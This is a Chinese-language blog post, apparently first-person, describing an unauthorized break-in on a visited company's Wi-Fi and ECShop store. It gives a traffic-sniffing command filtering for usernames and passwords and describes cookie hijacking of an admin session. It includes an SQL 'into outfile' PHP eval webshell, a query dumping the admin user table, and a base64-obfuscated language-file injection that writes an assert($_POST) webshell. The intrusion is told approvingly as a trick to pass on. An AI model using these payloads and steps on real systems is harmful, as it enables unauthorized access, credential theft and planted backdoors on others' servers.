前言：故事發生在前兩天，我們去參觀工業園區內一家電商公司。去參觀他們公司的時候，我說要用下無線網，他們技術說密碼就是他們的網站域名，我一臉懵逼表示我不知道域名，然後對方接過我手機給我連上了他們wifi。然後就有了後面的故事。0x01 邪惡的想法在回來的時候，我注意到，他們公司在二樓，在樓下wifi訊號也還好，然後我心中萌生了一個邪惡的想法。(๑*◡*๑)為了掩人耳目，我回公司帶上我筆記本開車再次來到他們樓下（在一個園區裡很近）熄火後我開啟筆記本，準備連線他們wifi，那麼問題來了，我蹭網的時候，密碼是他們技術給我輸入的，我不知道密碼啊？然鵝，這都不是事，哈哈。（小兄弟看你骨骼驚奇，這個姿勢我就免費傳授與你吧，希望能助你拯救世界一臂之力。）

xx.exe -idx 1 -ip 192.168.1.2-192.168.1.254 -port 80 -logfilter “+POST ,+GET ,+username,+password” -save_a save.log

幾分鐘以後，我們發現抓取到很多資料包。

 因為生成的記錄檔案比較大，我們用notepad++開啟。ctrf+f查詢關鍵詞：password、username、cookie等等敏感關鍵詞。通過查詢我發現區域網下有人在登入ecshop系統的後臺，雖然沒抓到密碼，但是我們抓到了cookie。

 0x04 cookie欺騙現在我們開啟cookie修改工具，輸入他後臺地址，然後點選進入，會獲取到一個未登入的cookie。

 然後把抓到的cookie複製到工具裡面，點選右邊的強制修改，提示修改完成後成功進入後臺。

0x05 sql寫shell進入後臺後才發現，這應該是個子賬號，只擁有上傳商品的許可權。

不管了，既然可以執行sql，那麼我們先獲取下網站路徑，然後直接sql寫shell試試。

訪問域名/api/cron.php報錯出得出以下路徑。

然後執行sql命令寫shell。

select '<?php @eval($_POST[cmd])?>' into outfile '/www/web/xxxxxx/public_html/log.php'

臉真黑，報錯了，嘗試了多種寫入方式都以失敗告終。

0x06 許可權突破經歷了各種碰壁之後，突然靈機一動，這不是可以查詢資料庫嗎？直接查admin所在表不就出資料了？於是說幹就幹，sql查詢框輸入以下命令

select * from ecs_admin_user

成功查詢出所有管理員賬號，第一個就是超級使用者，拿到md5後直接去解密，拿到明文。٩(๑❛ᴗ❛๑)۶0x07 換管理員賬號拿shell拿到超級使用者的賬號密碼後，我們重新登入後臺，輸入賬號密碼。因為是超級使用者，已經擁有所有許可權，我們找到左側的語言項編輯，然後在右邊輸入"使用者資訊"(沒有引號)，然後搜尋。把搜尋出來的"使用者資訊"修改成以下程式碼，然後儲存。

使用者資訊${${fputs(fopen(base64_decode(aWNxLnBocA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}

 然後我們訪問 域名/user.php 會在網站根目錄下生成一個icq.php的一句話檔案,密碼x